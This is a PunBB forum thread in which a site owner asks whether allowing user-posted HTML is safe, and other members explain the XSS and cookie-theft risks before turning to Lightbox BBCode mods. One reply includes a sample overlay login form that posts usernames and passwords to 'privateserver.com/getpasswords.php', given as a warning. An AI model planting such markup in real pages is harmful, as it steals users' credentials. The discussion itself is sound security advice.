Topic: HTML mod - safe ?

Hello,

I'm using PunBB1.2.14 and HTML mod.

Basically, I want the users of my website to add simple HTML code, YouTube videos, linked MP3s and linked images.

I run PunBB as a hidden forum meaning that users will see posts as being part of a user's profile. So if the user screws up his/her HTML, well it's not a problem for me.

From what I can see, allowing HTML within posts is completely safe (appart from the possible screwing up of pages). But is that entirely true ?

PS: [youtube]...[/youtube], [google, etc. are already in place but the users of my website just don't understand how to use them. So allowing copy/paste <embed> and <object> is the only solution I can think of.

Re: HTML mod - safe ?

Don't think it's very safe, I could probably write some Javascript that sends all the cookies of the viewing user to my server or so tongue

Re: HTML mod - safe ?

Plus, arbitrary Flash applets can redirect people as well. HTML can be dangerous wink

Re: HTML mod - safe ?

Surely posting the youtube/google video link inside [youtube] tags is much simpler than posting html code?

Re: HTML mod - safe ?

OK. Thanks for your replies.

So, if <script> is NOT allowed, then, there should be no security issue ? Is that all I should not allow ?

Well, as for liquidatOr, the big difference is that users just need to do a cut/paste from YouTube of the <object><embed... to their post. As a techie myself, I thought that the [youtube] solution was quite good, but believe me it is not obvious for MOST people. And when I see what people can do on myspace, I really wonder how they manage.

Re: HTML mod - safe ?

So, if <script> is NOT allowed, then, there should be no security issue ? Is that all I should not allow ?

No, any HTML tag can be manipulated to have javascript in it as an attribute.

Re: HTML mod - safe ?

There always remains a security issue tongue
I think it'd be better to write some sort of regex to let through the youtube HTML.

Re: HTML mod - safe ?

OK. OK. I see. Here is a warning from the CERT dating 2000 ! http://www.cert.org/advisories/CA-2000-02.html

Oh dear. By bye customization.

So it means that on myspace, people can do whatever they want since they can include any code they want. I really wonder how this has not lead to a major security catastrophy.

I thought I had the key to customizing my users profiles and posts. Need to think about something else I guess. One user has already done a copy/paste of a <object> from a music website and is complaining that it's not playing.

Re: HTML mod - safe ?

Well, myspace is adding more and more code to prevent malicious HTML. But that also means a huge codebase and way too much overhead tongue

Maybe something easier would be to provide a form where a youtube/whatever link is converted to BBCode?

Re: HTML mod - safe ?

Don't forget <object><applet> and others

Also, wouldn't be nice to have

<form action="http://privateserver.com/getpasswords.php">
<input type="text" name="username" style="position:absolute; left: 50px; top:70px;">
<input type="password" name="password" style="position:absolute; left: 50px; top:80px;">

Someone could put their own form in there, and place the input items overtop your own login input items.

Frankly, if you allow user submitted html anywhere on your site, people could come up with a new way to cause grief every other second tongue

echo "deadram"; echo; fortune;

Re: HTML mod - safe ?

play75010 wrote:

...
PS: [youtube]...[/youtube], [google, etc. are already in place but the users of my website just don't understand how to use them. So allowing copy/paste <embed> and <object> is the only solution I can think of.

I made a "mod"-javascript solution to this.
My users just write the link to the video and javascript transform to the <object>.
Works width YouTube, Metacafe, Google Video, iFilm, Revver and Bolt.

http://www.punres.org/viewtopic.php?id=3016

sorry for my english

12 (edited by MattF 2007-03-30 04:00)

Re: HTML mod - safe ?

Just out of curiosity, without enabling html in posts, how would one go about implementing the use of the quicktime/real mod and lightbox, (not the gallery one), which use the <a href links?

Re: HTML mod - safe ?

http://wiki.punres.org/Add_quicktime_an … deo_bbcode
Quicktime/Real doesn't require the user entering HTML (although the regex doesn't look particularly safe to me, someone could possibly inject things).

I assume that applies to the other mods you mention (you would need to link to them for me to double check)

14

Re: HTML mod - safe ?

I've just put up the info for the lightbox settings. The basics are the same across them all, (plus punres is down). big_smile



Lightbox: http://www.huddletogether.com/projects/lightbox2/

The settings are halfway down the page.

Re: HTML mod - safe ?

A PunBB mod that implemented it would rely on BBCode wink

16

Re: HTML mod - safe ?

Smartys wrote:

A PunBB mod that implemented it would rely on BBCode wink

big_smile Here's the readme file for the lightbox incorporation into punbb:

http://outgoing.bauchan.org/software/li … readme.txt


It may just be I that's missed the obvious, but I can't see any bbcode tag there. smile How would one go about incorporating it into the bbcode if so?


Cheers,

Matt

Re: HTML mod - safe ?

It modifies the parsing of the existing img BBCode wink

Re: HTML mod - safe ?

if you are going to use or make an HTML mod for your forum have it only for Admins of course, but better yet, only allowed by Admins in certain forums. In my forum, the admin can post HTML but only on the specific forums that allow this (these being the ones for news/announcements that appear on the homepage etc). Allowing unrestricted use of HTML by a certain group will also make the forum messier and make the divide between admins and regular users bigger.

19

Re: HTML mod - safe ?

Smartys wrote:

It modifies the parsing of the existing img BBCode wink

Talk about giving just enough info to confuse someone even more. big_smile Does that mean the url info goes between standard img tags, then?

Re: HTML mod - safe ?

MattF wrote:
Smartys wrote:

It modifies the parsing of the existing img BBCode wink

Talk about giving just enough info to confuse someone even more. big_smile Does that mean the url info goes between standard img tags, then?

It means exactly what I said tongue
The output that PunBB creates when using the img BBCode tags is modified to take advantage of the Lightbox script. It doesn't require the user to write any HTML.

21

Re: HTML mod - safe ?

Smartys wrote:

It means exactly what I said tongue
The output that PunBB creates when using the img BBCode tags is modified to take advantage of the Lightbox script. It doesn't require the user to write any HTML.

Just checking. big_smile It don't work, though. big_smile Have just disabled html, put the image url between standard [img] tags, and it just embeds it on the page, as usual.

Re: HTML mod - safe ?

Did you enable img BBCode in your forum? tongue

23

Re: HTML mod - safe ?

Smartys wrote:

Did you enable img BBCode in your forum? tongue

For a moment I was thinking I might look a right muppet then, big_smile, but checked and yup, I have. big_smile

I've copied and adapted the [url]parsing code, and have managed to get a basic lightbox parser working. I'm going to try and adapt it now to work with Koos 'Automatic Image Upload' format, the [url][img][img][url]setup to provide the preview thumbnail over the clickable link. Going to try and get the slideshow option in as well. Will post the diffs if I manage to get it all working. smile

24 (edited by MattF 2007-03-29 23:15)

Re: HTML mod - safe ?

Managed it, (just). big_smile Here's the link to the diff: http://outgoing.bauchan.org/software/lb … r.diff.txt

It has the same format as the url tags. The basic [lbox][lbox] format with the url inbetween the tags, and the [lbox=][img][img][lbox] format which allows it to show a thumbnail pic in the thread and link the larger image to the lightbox script. This one will take all the images from the topic/thread and show them in the slideshow type view. (Not sure if the slideshow function only applies to Lightbox V2).